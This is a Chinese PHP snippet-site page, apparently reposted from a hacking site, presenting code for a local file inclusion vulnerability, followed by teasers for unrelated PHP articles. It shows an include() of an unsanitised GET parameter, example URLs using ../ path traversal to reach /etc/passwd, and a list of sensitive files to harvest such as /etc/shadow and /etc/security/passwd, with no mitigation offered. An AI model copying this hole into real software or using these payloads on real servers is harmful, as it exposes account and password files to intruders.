宜配屋

php 伪造本地文件包含漏洞的代码

yipeiwu_com6年前PHP代码库
代码:
复制代码 代码如下:

<?php
$page=$_GET['page'];
include($page.'php');
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach
返回列表

上一篇:Python字符转换

下一篇:PHP生成静态页面详解

相关文章

PHP 简易输出CSV表格文件的方法详解

复制代码 代码如下:$ret = '';$arrs = array(array(1,'test1'),       ...

解析PayPal支付接口的PHP开发方式

申请PayPal注册网址:https://www.paypal.com/ paypal接口与其它接口有些不同,稍微复杂一点。 其实银行接口也算是一个站点的插件。 所谓paypal ip...

php根据日期或时间戳获取星座信息和生肖等信息

php根据日期或时间戳获取星座信息和生肖等信息

分享一个利用php根据日期或时间戳获取相应的干支纪年,生肖和星座信息的函数方法,具体函数代码以及使用方法如下: /** 判断干支、生肖和星座 */ function birt...

PHP编程实现计算抽奖概率算法完整实例

本文实例讲述了PHP编程实现计算抽奖概率算法。分享给大家供大家参考,具体如下: <?php //计算抽奖的概率 function get_rand($proArr)...

PHP不使用内置函数实现字符串转整型的方法示例

PHP不使用内置函数实现字符串转整型的方法示例

介绍 php字符串类型的数字如果想转成整型的数字,一般我们都是采用系统内置的API去做转换,但如果规定就不让我们去用系统内置的API转换,而是让自己去实现一个函数转换该怎么办?这里我们看...

© YiPeiWu.com 【宜配屋】 粤ICP备17031333号

Powered By Z-BlogPHP. Theme by TOYEAN.